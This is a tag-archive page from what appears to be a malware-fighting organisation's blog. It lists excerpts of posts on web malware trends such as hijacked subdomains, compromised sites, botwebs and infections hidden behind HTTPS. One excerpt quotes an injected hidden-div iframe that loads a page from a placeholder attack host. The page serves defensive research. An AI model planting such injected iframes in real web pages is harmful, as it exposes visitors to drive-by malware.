Search
Archives
- January 2012
- December 2011
- November 2011
- October 2011
- September 2011
- August 2011
- July 2011
- June 2011
- May 2011
- April 2011
- March 2011
- February 2011
- January 2011
- December 2010
- November 2010
- October 2010
- September 2010
- August 2010
- July 2010
- June 2010
- May 2010
- April 2010
- March 2010
- February 2010
- January 2010
- December 2009
- November 2009
- October 2009
- September 2009
- August 2009
- July 2009
- June 2009
- May 2009
- April 2009
- March 2009
- February 2009
- January 2009
- December 2008
- November 2008
- October 2008
- September 2008
- August 2008
- July 2008
- June 2008
- May 2008
- April 2008
- March 2008
- February 2008
- January 2008
- December 2007
- November 2007
- October 2007
- September 2007
- August 2007
- July 2007
- June 2007
- May 2007
- April 2007
- March 2007
- February 2007
- January 2007
- December 2006
- November 2006
- October 2006
- August 2006
- July 2006
- June 2006
- May 2006
- March 2006
- February 2006
- January 2006
Delicious/stopbadware
Partners
Tag Archives: trends
Why Finland has so little malware
Tim Rains from Microsoft’s Trustworthy Computing group recently posted an excellent series of short blog posts titled Lessons from Some of the Least Malware Infected Countries in the World. Tim asked local security experts in each of these countries why … Continue reading
Hijacked subdomains still serving malware
Last month the Unmask Parasites blog wrote about attacks using hijacked sudomains of legitimate websites to serve badware. At the time of that articles publication the attacks had been going on for a month already. We are still seeing a … Continue reading
Tagged godaddy, infections, subdomains, trends
Comments Off
AV vendors say most badware sites are compromised
A recent report from Symantec reinforces the idea that most web-based malware is distributed via compromised, legitimate sites: In 2010 so far, using the same approach, the proportion of malicious domains that are legitimate [i.e., set up for reasons other … Continue reading
Interesting attacks from .NL addresses
I’m researching some new attacks that have been popping up on the BadwareBusters forum recently. Attacks have the form: <div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http:ATTACK.SITE:8080/index.php"></iframe></div> After reviewing the posts by our users I compiled the following list of attack … Continue reading
Botweb using compromised Linux servers
Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb (a term coined by our own Oliver Day) that he’s been investigating: What we see here is a long awaited botnet of zombie web servers! A … Continue reading
Google Timer objects showing up in attack code
I have been seeing more attack javascript using google timer objects. I’m not sure if this is to improve the reliability of the exploit but it is an interesting signature of the code. I’ve included a sample below (spaces added): … Continue reading
Tagged javascript, trends
Comments Off
Recent web attack flawed, reducing effectiveness
Mary Landesman at ScanSafe recently reported a script injection attack, and Ryan Naraine picked up the story over on the Zero Day blog. While the initial report describes 55,000 web pages (not web sites as the Zero Day post states) … Continue reading
Tagged stopbadware, trends
Comments Off
Hiding an infection in an unused SSL site
Today we saw an interesting case where no one could find badware in a website that Google reported as infected—until Google tipped us off to check the site using https (i.e., instead of testing http://example.com, we tested https://example.com). Sure enough, … Continue reading
Tagged ssl, stopbadware, trends
Comments Off
Community member describes meta redirects
BadwareBusters.org community member Denis describes an emerging web-based malware attack over on his Unmask Parasites blog, and he is seeking additional information: I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only … Continue reading
Tagged stopbadware, trends
Comments Off
Rise of Botwebs
Botnets have been a fixture of the internet for many years. Their command and control structures have evolved greatly but their methods of propagation have largely gone unchanged. The recent advent of drive-by downloads have been part of a new … Continue reading
Tagged botweb, emerging, gumblar, stopbadware, trends
Comments Off
